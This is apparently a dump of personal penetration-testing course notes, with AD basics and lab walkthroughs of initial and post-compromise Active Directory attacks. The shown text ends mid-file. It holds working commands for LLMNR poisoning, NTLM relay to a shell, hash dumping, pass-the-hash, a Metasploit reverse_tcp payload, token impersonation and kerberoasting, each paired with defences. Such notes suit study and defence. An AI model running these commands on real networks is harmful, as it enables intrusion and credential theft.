├── .gitbook └── assets │ └── image.png ├── README.md ├── SUMMARY.md ├── active-directory ├── ad-basics.md ├── cheat-sheet.md └── peh │ ├── README.md │ ├── initial-attack-vectors.md │ ├── post-compromise-attacks.md │ └── post-compromise-enumeration.md ├── apis ├── apisec.md ├── methodology │ └── README.md ├── resources.md ├── thm.md └── xss-rat.md ├── cloud └── aws │ ├── README.md │ └── ctfs.md ├── exploitation ├── exploitation-basics.md └── shells.md ├── information-gathering-reconnaissance └── passive-reconnaissance.md ├── misc ├── containers.md ├── git.md ├── interesting-files.md ├── linux.md ├── networking.md ├── note-taking.md ├── powershell.md ├── python.md ├── todo.md └── tools.md ├── mobile ├── android │ ├── README.md │ ├── methodology.md │ └── support-and-tools.md ├── ios │ ├── README.md │ └── ios-forensics.md ├── linkedin-learning.md └── tcm-mobile │ ├── README.md │ └── android.md ├── penetration-testing-methodology ├── 5-stages-of-ethical-hacking.md └── the-cyber-kill-chain.md ├── pentesting-network ├── 110-pop3.md ├── 111-rpcbind.md ├── 11211-memcached.md ├── 135-rpc.md ├── 137-138-139-netbios.md ├── 139-445-smb.md ├── 1433-mssql.md ├── 161-snmp.md ├── 2049-nfs.md ├── 21-ftp.md ├── 22-ssh.md ├── 23-telnet.md ├── 25-smtp.md ├── 27017-27018-27019-mongodb.md ├── 3128-squid.md ├── 3306-mysql.md ├── 3389-rdp.md ├── 3632-distcc.md ├── 389-ldap.md ├── 464-kpasswd.md ├── 53-dns.md ├── 5432-postgresql.md ├── 5900-vnc.md ├── 5984-6984-couchdb.md ├── 5985-winrm.md ├── 6379-redis.md ├── 6667-irc.md ├── 69-tftp.md ├── 79-finger.md ├── 80-443-http-s │ ├── README.md │ ├── drupal.md │ ├── joomla.md │ ├── node.js.md │ ├── phpmyadmin.md │ ├── tomcat.md │ ├── webdav.md │ └── wordpress.md ├── 873-rsync.md ├── 88-kerberos.md └── 9200-9300-elasticsearch.md ├── pentesting-web ├── authentication.md ├── burp-suite.md ├── command-injection │ ├── README.md │ └── portswigger-notes.md ├── directory-traversal.md ├── idor-insecure-direct-object-reference.md ├── jwt-attacks.md ├── nosql-injection.md ├── sqli-sql-injection.md ├── unrestricted-file-upload.md ├── web-testing.md ├── xss-cross-site-scripting │ ├── README.md │ └── portswigger-notes.md └── xxe-xml-external-entity.md ├── phishing ├── phishing-hiddeneye.md └── phishing.md ├── post-exploitation ├── cleanup.md ├── data-exfiltration.md ├── maintaining-access.md ├── passwords.md └── tunneling-and-port-forwarding.md ├── privilege-escalation ├── linux.md └── windows.md ├── scanning-and-enumeration ├── enumeration.md ├── network-scanning.md └── vulnerability-scanning.md └── wireless └── wireless-hacking-101.md /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H3r1CH/penetration-testing/d561af2bef61a251767b3b9b95059d0b67153c01/.gitbook/assets/image.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Page 1 2 | 3 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [README](README.md) 4 | 5 | ## Penetration Testing Methodology 6 | 7 | * [5 Stages of Ethical Hacking](penetration-testing-methodology/5-stages-of-ethical-hacking.md) 8 | * [The Cyber Kill Chain](penetration-testing-methodology/the-cyber-kill-chain.md) 9 | 10 | ## Information Gathering (Reconnaissance) 11 | 12 | * [Passive Reconnaissance](information-gathering-reconnaissance/passive-reconnaissance.md) 13 | 14 | ## Scanning & Enumeration 15 | 16 | * [Network Scanning](scanning-and-enumeration/network-scanning.md) 17 | * [Vulnerability Scanning](scanning-and-enumeration/vulnerability-scanning.md) 18 | * [Enumeration](scanning-and-enumeration/enumeration.md) 19 | 20 | ## Pentesting Network 21 | 22 | * [21 (FTP)](pentesting-network/21-ftp.md) 23 | * [22 (SSH)](pentesting-network/22-ssh.md) 24 | * [23 (Telnet)](pentesting-network/23-telnet.md) 25 | * [25 (SMTP)](pentesting-network/25-smtp.md) 26 | * [53 (DNS)](pentesting-network/53-dns.md) 27 | * [69 (TFTP)](pentesting-network/69-tftp.md) 28 | * [79 (Finger)](pentesting-network/79-finger.md) 29 | * [80,443 (HTTP/S)](pentesting-network/80-443-http-s/README.md) 30 | * [Drupal](pentesting-network/80-443-http-s/drupal.md) 31 | * [Joomla](pentesting-network/80-443-http-s/joomla.md) 32 | * [Node.js](pentesting-network/80-443-http-s/node.js.md) 33 | * [phpMyAdmin](pentesting-network/80-443-http-s/phpmyadmin.md) 34 | * [Tomcat](pentesting-network/80-443-http-s/tomcat.md) 35 | * [WebDAV](pentesting-network/80-443-http-s/webdav.md) 36 | * [WordPress](pentesting-network/80-443-http-s/wordpress.md) 37 | * [88 (Kerberos)](pentesting-network/88-kerberos.md) 38 | * [110 (POP3)](pentesting-network/110-pop3.md) 39 | * [111 (Rpcbind)](pentesting-network/111-rpcbind.md) 40 | * [135 (RPC)](pentesting-network/135-rpc.md) 41 | * [137,138,139 (NetBIOS)](pentesting-network/137-138-139-netbios.md) 42 | * [139,445 (SMB)](pentesting-network/139-445-smb.md) 43 | * [161 (SNMP)](pentesting-network/161-snmp.md) 44 | * [389 (LDAP)](pentesting-network/389-ldap.md) 45 | * [464 (kpasswd)](pentesting-network/464-kpasswd.md) 46 | * [873 (rsync)](pentesting-network/873-rsync.md) 47 | * [1433 (MSSQL)](pentesting-network/1433-mssql.md) 48 | * [2049 (NFS)](pentesting-network/2049-nfs.md) 49 | * [3128 (Squid)](pentesting-network/3128-squid.md) 50 | * [3306 (MySQL)](pentesting-network/3306-mysql.md) 51 | * [3389 (RDP)](pentesting-network/3389-rdp.md) 52 | * [3632 (distcc)](pentesting-network/3632-distcc.md) 53 | * [5432 (postgresql)](pentesting-network/5432-postgresql.md) 54 | * [5900 (VNC)](pentesting-network/5900-vnc.md) 55 | * [5984, 6984 (CouchDB)](pentesting-network/5984-6984-couchdb.md) 56 | * [5985 (WinRM)](pentesting-network/5985-winrm.md) 57 | * [6379 (Redis)](pentesting-network/6379-redis.md) 58 | * [6667 (IRC)](pentesting-network/6667-irc.md) 59 | * [9200, 9300 (Elasticsearch)](pentesting-network/9200-9300-elasticsearch.md) 60 | * [11211 (Memcached)](pentesting-network/11211-memcached.md) 61 | * [27017, 27018, 27019 (MongoDB)](pentesting-network/27017-27018-27019-mongodb.md) 62 | 63 | ## Pentesting Web 64 | 65 | * [Burp Suite](pentesting-web/burp-suite.md) 66 | * [Web Testing](pentesting-web/web-testing.md) 67 | * [Authentication](pentesting-web/authentication.md) 68 | * [Command Injection](pentesting-web/command-injection/README.md) 69 | * [PortSwigger Notes](pentesting-web/command-injection/portswigger-notes.md) 70 | * [Directory Traversal](pentesting-web/directory-traversal.md) 71 | * [IDOR (Insecure Direct Object Reference)](pentesting-web/idor-insecure-direct-object-reference.md) 72 | * [JWT Attacks](pentesting-web/jwt-attacks.md) 73 | * [NoSQL Injection](pentesting-web/nosql-injection.md) 74 | * [SQLi (SQL Injection)](pentesting-web/sqli-sql-injection.md) 75 | * [Unrestricted File Upload](pentesting-web/unrestricted-file-upload.md) 76 | * [XSS (Cross-Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md) 77 | * [PortSwigger Notes](pentesting-web/xss-cross-site-scripting/portswigger-notes.md) 78 | * [XXE (XML External Entity)](pentesting-web/xxe-xml-external-entity.md) 79 | 80 | ## Exploitation 81 | 82 | * [Exploitation Basics](exploitation/exploitation-basics.md) 83 | * [Shells](exploitation/shells.md) 84 | 85 | ## Post Exploitation 86 | 87 | * [Passwords](post-exploitation/passwords.md) 88 | * [Data Exfiltration](post-exploitation/data-exfiltration.md) 89 | * [Maintaining Access](post-exploitation/maintaining-access.md) 90 | * [Tunneling and Port Forwarding](post-exploitation/tunneling-and-port-forwarding.md) 91 | * [Cleanup](post-exploitation/cleanup.md) 92 | 93 | ## Privilege Escalation 94 | 95 | * [Linux](privilege-escalation/linux.md) 96 | * [Windows](privilege-escalation/windows.md) 97 | 98 | ## Active Directory 99 | 100 | * [Cheat Sheet](active-directory/cheat-sheet.md) 101 | * [AD Basics](active-directory/ad-basics.md) 102 | * [PEH](active-directory/peh/README.md) 103 | * [Initial Attack Vectors](active-directory/peh/initial-attack-vectors.md) 104 | * [Post-Compromise Enumeration](active-directory/peh/post-compromise-enumeration.md) 105 | * [Post Compromise Attacks](active-directory/peh/post-compromise-attacks.md) 106 | 107 | ## Mobile 108 | 109 | * [LinkedIn Learning](mobile/linkedin-learning.md) 110 | * [Android](mobile/android/README.md) 111 | * [Methodology](mobile/android/methodology.md) 112 | * [Support and Tools](mobile/android/support-and-tools.md) 113 | * [iOS](mobile/ios/README.md) 114 | * [iOS Forensics](mobile/ios/ios-forensics.md) 115 | * [TCM - Mobile](mobile/tcm-mobile/README.md) 116 | * [Android](mobile/tcm-mobile/android.md) 117 | 118 | ## Cloud 119 | 120 | * [AWS](cloud/aws/README.md) 121 | * [CTFs](cloud/aws/ctfs.md) 122 | 123 | ## APIs 124 | 125 | * [Methodology](apis/methodology/README.md) 126 | * [APISEC](apis/apisec.md) 127 | * [THM](apis/thm.md) 128 | * [XSS Rat](apis/xss-rat.md) 129 | * [Resources](apis/resources.md) 130 | 131 | ## Wireless 132 | 133 | * [Wireless Hacking 101](wireless/wireless-hacking-101.md) 134 | 135 | ## Phishing 136 | 137 | * [Phishing](phishing/phishing.md) 138 | * [Phishing: HiddenEye](phishing/phishing-hiddeneye.md) 139 | 140 | ## Misc 141 | 142 | * [Note Taking](misc/note-taking.md) 143 | * [Networking](misc/networking.md) 144 | * [Linux](misc/linux.md) 145 | * [PowerShell](misc/powershell.md) 146 | * [Python](misc/python.md) 147 | * [Containers](misc/containers.md) 148 | * [Git](misc/git.md) 149 | * [Tools](misc/tools.md) 150 | * [Interesting Files](misc/interesting-files.md) 151 | * [TODO](misc/todo.md) 152 | -------------------------------------------------------------------------------- /active-directory/ad-basics.md: -------------------------------------------------------------------------------- 1 | # AD Basics 2 | 3 | ## Domain Controllers 4 | 5 | A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain. 6 | 7 | * holds the AD DS data store 8 | * handles authentication and authorization services 9 | * replicate updates from other domain controllers in the forest 10 | * Allows admin access to manage domain resources 11 | 12 | ## AD DS Data Store 13 | 14 | The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. 15 | 16 | * Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users 17 | * Stored by default in %SystemRoot%\NTDS 18 | * accessible only by the domain controller 19 | 20 | ## Forest 21 | 22 | A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole. The Forest consists of: 23 | 24 | * Trees - A hierarchy of domains in Active Directory Domain Services 25 | * Domains - Used to group and manage objects 26 | * Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs 27 | * Trusts - Allows users to access resources in other domains 28 | * Objects - users, groups, printers, computers, shares 29 | * Domain Services - DNS Server, LLMNR, IPv6 30 | * Domain Schema - Rules for object creation 31 | 32 | ## Users + Groups 33 | 34 | ### Users 35 | 36 | There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are: 37 | 38 | * Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller. 39 | * Service Accounts (Can be Domain Admins) - These are for the most part never used except for service maintenance, they are required by Windows for services such as SQL to pair a service with a service account 40 | * Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller 41 | * Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization. 42 | 43 | ### Groups 44 | 45 | Groups make it easier to give permissions to users and objects by organizing them into groups with specified permissions. There are two overarching types of Active Directory groups: 46 | 47 | * Security Groups - These groups are used to specify permissions for a large number of users 48 | * Distribution Groups - These groups are used to specify email distribution lists. As an attacker these groups are less beneficial to us but can still be beneficial in enumeration 49 | 50 | ## Trusts + Policies 51 | 52 | ### Trusts 53 | 54 | Trusts are a mechanism in place for users in the network to gain access to other resources in the domain. For the most part, trusts outline the way that the domains inside of a forest communicate to each other, in some environments trusts can be extended out to external domains and even forests in some cases. 55 | 56 | There are two types of trusts that determine how the domains communicate. 57 | 58 | * Directional - The direction of the trust flows from a trusting domain to a trusted domain 59 | * Transitive - The trust relationship expands beyond just two domains to include other trusted domains 60 | 61 | ### Policies 62 | 63 | They dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole. 64 | 65 | I'll outline just a few of the many policies that are default or you can create in an Active Directory environment: 66 | 67 | * Disable Windows Defender - Disables windows defender across all machine on the domain 68 | * Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller 69 | 70 | ## AD DS + Authentication 71 | 72 | ### Domain Services 73 | 74 | They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller. Outlined below are the default domain services: 75 | 76 | * LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services 77 | * Certificate Services - allows the domain controller to create, validate, and revoke public key certificates 78 | * DNS, LLMNR, NBT-NS - Domain Name Services for identifying IP hostnames 79 | 80 | ### Domain Authentication 81 | 82 | The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols set in place. There are two main types of authentication in place for Active Directory: NTLM and Kerberos. 83 | 84 | * Kerberos - The default authentication service for Active Directory uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain. 85 | * NTLM - default Windows authentication protocol uses an encrypted challenge/response protocol 86 | 87 | ## AD in the Cloud 88 | 89 | ### Azure AD 90 | 91 | Azure acts as the middle man between your physical Active Directory and your users' sign on. This allows for a more secure transaction between domains, making a lot of Active Directory attacks ineffective. 92 | 93 | ### Cloud Security 94 | 95 | The best way to show you how the cloud takes security precautions past what is already provided with a physical network is to show you a comparison with a cloud Active Directory environment: 96 | 97 | | **Windows Server AD** | **Azure AD** | 98 | | --------------------- | -------------- | 99 | | LDAP | Rest APIs | 100 | | NTLM | OAuth/SAML | 101 | | Kerberos | OpenID | 102 | | OU Tree | Flat Structure | 103 | | Domains and Forests | Tenants | 104 | | Trusts | Guests | 105 | -------------------------------------------------------------------------------- /active-directory/peh/README.md: -------------------------------------------------------------------------------- 1 | # PEH 2 | 3 | ## Active Directory Overview 4 | 5 | ### Active Directory Overview 6 | 7 | #### What is Active Directory? 8 | 9 | * Directory service developed by Microsoft to manage Windows domain networks 10 | * Stores information related to objects, such as Computers, Users, Printers, etc. 11 | * Think about it as a phone book for Windows 12 | * Authenticates using Kerberos tickets 13 | * Non-Windows devices, such as Linux machines, firewalls, etc. can also authenticate to Active Directory via RADIUS or LDAP 14 | 15 | #### Why Active Directory? 16 | 17 | * Active Directory is the most commonly used identity management service in the world 18 | * 95% of Fortune 1000 companies implement the service in their networks \ 19 | * Can be exploited without ever attacking patchable exploits 20 | * Instead, we abuse features, trusts, components, and more. 21 | 22 | ### Physical Active Directory Components 23 | 24 | #### Domain Controllers 25 | 26 | * A domain controller is a server with the AD DS server role installed that has specifically been promoted to a domain controller. Domain Controllers: 27 | * Host a copy of the AD DS directory store 28 | * Provide authentication and authorization services 29 | * Replicate updates to older domain controllers in the domain and forest 30 | * Allow administrative access to manage user accounts and network resources 31 | 32 | #### AD DS Data Store 33 | 34 | * The AD DS data store contains the database files and processes that store and manage directory information for users, services, and applications. The AD DS data store: 35 | * Consists of the Ntds.dit file 36 | * Is stored by default in the %SystemRoot%\NTDS folder on all domain controllers 37 | * Is accessible only through the domain controller processes and protocols 38 | 39 | ### Logical Active Directory Components 40 | 41 | #### AD DS Schema 42 | 43 | * The AD DS Schema: 44 | * Defines every type of object that can be stored in the directory 45 | * Enforces rules regarding object creation and configuration 46 | 47 | #### Domains 48 | 49 | * Domains are sued to group and manage objects in an organization. Domains: 50 | * An administrative boundary for applying policies to groups of objects 51 | * A replication boundary for replicating data between domain controllers 52 | * An authentication and authorization boundary that provides a way to limit the scope of access to resources 53 | 54 | #### Trees 55 | 56 | * A domain tree is a hierarchy of domains in AD DS 57 | * Ex: contoso.com --> emea.contoso.com, na.contoso.com 58 | * All domains in the tree: 59 | * Share a contiguous namespace with the parent domain 60 | * Can have additional child domains 61 | * By default create a two-way transitive trust with other domains 62 | 63 | #### Forest 64 | 65 | * A Forest is a collection of one or more domain trees. Forests: 66 | * Share a common schema 67 | * Share a common configuration partition 68 | * Share a common global catalog to enable searching 69 | * Enable trusts between all domains in the forest 70 | * Share the Enterprise Admins and Schema Admins groups 71 | 72 | #### Organizational Units (OUs) 73 | 74 | * OUs are Active Directory containers that can contain users, groups, computers, and other OUs. OUs are used to: 75 | * Represent your organization hierarchically and logically 76 | * Manage a collection of objects in a consistent way 77 | * Delegate permissions to administer groups of objects 78 | * Apply policies 79 | 80 | #### Trusts 81 | 82 | * Trusts provide a mechanism for users to gain access to resources in another domain 83 | 84 | | Types of Trusts | Description | Diagram | 85 | | --------------- | --------------------------------------------------------------------------------------------- | ------- | 86 | | Directional | The trust direction flows from trusting domain to the trusted domain | | 87 | | Transitive | The trust relationship is extended beyond a two-domain trust to include other trusted domains | | 88 | 89 | * All domains in a forest trust all other domains in the forest 90 | * Trusts can extend outside the forest 91 | 92 | #### Objects 93 | 94 |
ObjectDescription
User
  • Enables network resource access for a user
InetOrgPerson
  • Similar to a user account
  • Used for compatibility with other directory services
Contacts
  • Used primarily to assign e-mail addresses to external users
  • Does not enable network access
Groups
  • Used to simplify the administration of access control
Computers
  • Enables authentication and auditing of computer access to resources
Printers
  • Used to simplify the process of locating and connecting to printers
Shared folders
  • Enables users to search for shared folders based on properties
95 | -------------------------------------------------------------------------------- /active-directory/peh/initial-attack-vectors.md: -------------------------------------------------------------------------------- 1 | # Initial Attack Vectors 2 | 3 | ## Introduction 4 | 5 | {% embed url="https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa" %} 6 | 7 | ## LLMNR Poisoning Overview 8 | 9 | #### What is LLMNR? 10 | 11 | Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. 12 | 13 | * Used to identify hosts when DNS fails to do so. 14 | * Previously NBT-NS 15 | * Key flaw is that the services utilizes a user's username and NTLMv2 hash when appropriately responded to. 16 | 17 | #### Steps 18 | 19 | 1. Run Responder 20 | 1. `python3 /usr/share/responder/Responder.py -I tun0 -rdw -v` 21 | 2. An Even Occurs 22 | 1. i.e. someone typed in the wrong network drive (DNS failing) 23 | 3. Get the Hashes 24 | 1. Copy from Responder output and place in a text file 25 | 4. Crack the Hashes 26 | 1. `hashcat -m 5600 hashes.txt rockyou.txt` 27 | 28 | ### Capturing NTLMv2 Hashes with Responder 29 | 30 | #### From Kali 31 | 32 | ```bash 33 | kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw 34 | ... 35 | [+] Listening for events... 36 | ``` 37 | 38 | #### From Windows Machine (MARVEL\fcastle) 39 | 40 | Opened file Explorer, and type \\\192.168.1.165 (The Kali IP address on eth0). 41 | 42 | #### From Kali Machine 43 | 44 | Responder grabs the hash from the previous event. 45 | 46 | ```bash 47 | [SMB] NTLMv2-SSP Client : 192.168.1.157 48 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 49 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:8ab5671e342774e7:B66F027CB5E16825C8967D591C85FA76:0101000000000000C0653150DE09D2012F006B8AD271B58B000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000010000000020000031452132010184239D06D2B1049A174FC1A65A7E3EDCB6CD78A3CA55D16431910A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0031002E003100360035000000000000000000 50 | [*] Skipping previously captured hash for MARVEL\fcastle 51 | ``` 52 | 53 | ### Password Cracking with Hashcat 54 | 55 | From the hash found in the previous section an attempt to crack it 56 | 57 | ```bash 58 | kali@kali:~/ctf/tcm/peh$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 59 | ... 60 | :Password1 61 | ``` 62 | 63 | ### LLMNR Poisoning Defense 64 | 65 | #### Mitigation 66 | 67 | The best defense in this case is to disable LLMNR and NBT-NS. 68 | 69 | * To disable LLMNR,... 70 | * To disable NBT-NS,... 71 | 72 | If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to: 73 | 74 | * Require Network Access Control. 75 | * Require strong user passwords. The more complex and long the password, the harder it is for an attacker to crack the hash. 76 | 77 | ## SMB Relay Attacks Overview 78 | 79 | #### What is SMB Relay? 80 | 81 | Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. 82 | 83 | #### Requirements 84 | 85 | * SMB signing must be disabled on the target 86 | * Relayed user credentials must be admin on machine. 87 | 88 | #### Steps 89 | 90 | 1. Run Responder 91 | 1. vim /usr/share/responder/Responder.conf --> Turn Off SMB and HTTP 92 | 2. Run Responder 93 | 1. `kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw` 94 | 3. Set up your relay 95 | 1. `python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support` 96 | 4. An even occurs 97 | 1. i.e. someone typed in the wrong network drive (DNS failing) 98 | 5. Get the hashes 99 | 100 | ### Discovering Hosts with SMB Signing Disabled 101 | 102 | #### From Kali 103 | 104 | ```bash 105 | kali@kali:~/ctf/tcm/peh$ sudo nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24 106 | ... 107 | Host scipr results: 108 | | smb2-security-mode: 109 | | 2.02: 110 | | Message signing enabled but not required 111 | ``` 112 | 113 | ### SMB Relay Attack Demonstration 114 | 115 | After making necessary changes to Responder.conf... 116 | 117 | #### Run Responder 118 | 119 | ```bash 120 | kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw 121 | ... 122 | [+] Listening for events... 123 | ``` 124 | 125 | #### Run ntlmrelayx 126 | 127 | ```bash 128 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -tf targets.txt -smb2support 129 | ... 130 | [*] Servers started, waiting for connections 131 | ``` 132 | 133 | #### Trigger Connection 134 | 135 | #### From Target 136 | 137 | Type `\\ATTACKER-IP` in File Explorer 138 | 139 | #### From Kali 140 | 141 | Hashes returned as well as a dumping of local SAM hashes 142 | 143 | ### Getting a Shell 144 | 145 | Instead of running ntlmrelayx like before, the `-i` option to try and get an interactive shell 146 | 147 | ```bash 148 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -tf targets.txt -smb2support -i 149 | ... 150 | [*] Servers started, waiting for connections 151 | ``` 152 | 153 | Run the same action from Trigger Connection section 154 | 155 | In the output it will say where the shell was returned i.e. 127.0.0.1:11000 156 | 157 | Use netcat to connection to this port 158 | 159 | ```bash 160 | kali@kali:~/ctf/tcm/peh$ nc 127.0.0.1 11000 161 | # help 162 | We are in an SMB shell essentially 163 | # shares 164 | # use C$ 165 | ``` 166 | 167 | ### SMB Relay Attack Defenses 168 | 169 | #### Mitigation 170 | 171 | * Enable SMB Signing on all devices 172 | * Pro: Completely stops the attack 173 | * Con: Can cause performance issues with file copies 174 | * Disable NTLM authentication on network 175 | * Pro: Completely stops the attack 176 | * Con: If Kerberos stops working, Windows defaults back to NTLM 177 | * Account Tiering: 178 | * Pro: Limits domain admins to specific tasks 179 | * Con: Enforcing the policy may be difficult 180 | * Local Admin Restriction: 181 | * Pro: Can prevent a lot of lateral movement 182 | * Con: Potential increase in the amount of service desk tickets 183 | 184 | ### Gaining Shell Access 185 | 186 | Metasploit Walkthrough 187 | 188 | Also Metasploit psexec vs psexec.py, wmiexec.py, smbexec.py 189 | 190 | ## IPv6 Attacks Overview 191 | 192 | ### Installing mitm6 193 | 194 | {% embed url="https://github.com/dirkjanm/mitm6" %} 195 | 196 | ### Setting Up LDAPS 197 | 198 | Walkthrough of setting up LDAPS server on the Windows Server 199 | 200 | ### IPv6 DNS Takeover via mitm6 201 | 202 | #### Run mitm6 203 | 204 | ```bash 205 | kali@kali:~/ctf/tcm/peh$ mitm6 -d marvel.local 206 | ``` 207 | 208 | #### Run ntlmrelayx 209 | 210 | ```bash 211 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -6 -t ldaps// -wh fakewpad.marvel.local -l lootme 212 | ``` 213 | 214 | {% embed url="https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6" %} 215 | 216 | {% embed url="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation" %} 217 | 218 | ### IPv6 Attack Defenses 219 | 220 | #### Mitigation 221 | 222 | 1. IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don't use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working: 223 | 1. a... 224 | 2. b... 225 | 3. c... 226 | 2. If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service. 227 | 3. Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding. 228 | 4. Consider Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation. 229 | 230 | ### Passback Attacks 231 | 232 | {% embed url="https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack" %} 233 | 234 | ## Other Attack Vectors and Strategies 235 | 236 | ### Strategies 237 | 238 | * Begin the day with mitm6 or Responder 239 | * Run scans to generate traffic 240 | * If scans are taking too long, look for websites in scope (http\_version) 241 | * Look for default credentials on web logins 242 | * Printers 243 | * Jenkins 244 | * Etc. 245 | * Think outside the box 246 | -------------------------------------------------------------------------------- /active-directory/peh/post-compromise-attacks.md: -------------------------------------------------------------------------------- 1 | # Post Compromise Attacks 2 | 3 | ## Pass the Password Attacks 4 | 5 | #### crackmapexec 6 | 7 | ```bash 8 | kali@kali:~/ctf/tcm/peh$ crackmapexec smb 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 9 | # Dump the SAM hashes 10 | --sam 11 | # Dump the LSA secrets 12 | --lsa 13 | # Dump the NTDS.dit 14 | --ntds 15 | ``` 16 | 17 | #### psexec 18 | 19 | ```bash 20 | kali@kali:~/ctf/tcm/peh$ /usr/share/doc/python3-impacket/examples/psexec.py marvel/fcastle:Password1@192.168.57.142 21 | ``` 22 | 23 | ## Dumping Hashes with secretsdump.py 24 | 25 | #### secretsdump 26 | 27 | ```bash 28 | kali@kali:~/ctf/tcm/peh$ /usr/share/doc/python3-impacket/examples/secretsdump.py marvel/fcastle:Password1@192.168.57.141 29 | ``` 30 | 31 | ## Cracking NTLM Hashes with Hashcat 32 | 33 | #### hashcat 34 | 35 | ```bash 36 | kali@kali:~/ctf/tcm/peh$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt 37 | ``` 38 | 39 | ## Pass the Hash Attacks 40 | 41 | #### crackmapexec 42 | 43 | ```bash 44 | kali@kali:~/ctf/tcm/peh$ crackmapexec smb 192.168.57.0/24 -u "Frank Castle" -H --local-auth 45 | ``` 46 | 47 | ## Pass Attack Mitigations 48 | 49 | Hard to completely prevent, but we can make it more difficult on an attacker: 50 | 51 | * Limit account re-use 52 | * Avoid re-using local admin password 53 | * Disable Guest and Administrator accounts 54 | * Limit who is a local administrator (least privilege) 55 | * Utilize strong passwords 56 | * The longer the better 57 | * Avoid using common words 58 | * Long sentences 59 | * Privilege Access Management (PAM) 60 | * Check out/in sensitive accounts when needed 61 | * Automatically rotate passwords on check out and check in 62 | * Limits pass attacks as hash/password is strong and constantly rotated 63 | 64 | ## Token Impersonation 65 | 66 | ### Overview 67 | 68 | #### What are tokens? 69 | 70 | * Temporary keys that allow you to access to a system/network without having to provide credentials each time you access a file. Think cookies for computers. 71 | 72 | #### Two Types 73 | 74 | * Delegate - Created for logging into a machine or using Remote Desktop 75 | * Impersonate - "non-interactive" such as attach a network drive or a domain logon script 76 | 77 | ### Token Impersonation with Incognito 78 | 79 | #### Metasploit 80 | 81 | ```bash 82 | msfconsole 83 | use exploit/windows/smb/psexec 84 | # Set RHOSTS, SMBDomain, SMBPass, and SMBUser; 85 | # set target 2; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 86 | run 87 | # hashdump 88 | # getuid 89 | # sysinfo 90 | load incognito 91 | help 92 | list_tokens -u 93 | impersonate_token marvel\\administrator 94 | shell 95 | whoami 96 | ``` 97 | 98 | ### Mitigation 99 | 100 | #### Strategies 101 | 102 | * Limit user/group token creation permissions 103 | * Account tiering 104 | * Local admin restriction 105 | 106 | ## Kerberoasting 107 | 108 | ### Overview 109 | 110 | [https://medium.com/@Shorty420/kerberoasting-9108477279cc](https://medium.com/@Shorty420/kerberoasting-9108477279cc) 111 | 112 | #### Steps 113 | 114 | 1. Get SPNs, Dump Hash 115 | 1. `python GetUserSPNs.py dc-ip -request` 116 | 2. Crack that hash 117 | 1. `hashcat -m 13100 kerberoast.txt rockyou.txt` 118 | 119 | ### Example 120 | 121 | #### GetUserSPNs 122 | 123 | ```bash 124 | GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 125 | ``` 126 | 127 | Copy the hash from the output and paste it into a text file. 128 | 129 | #### hashcat 130 | 131 | ```bash 132 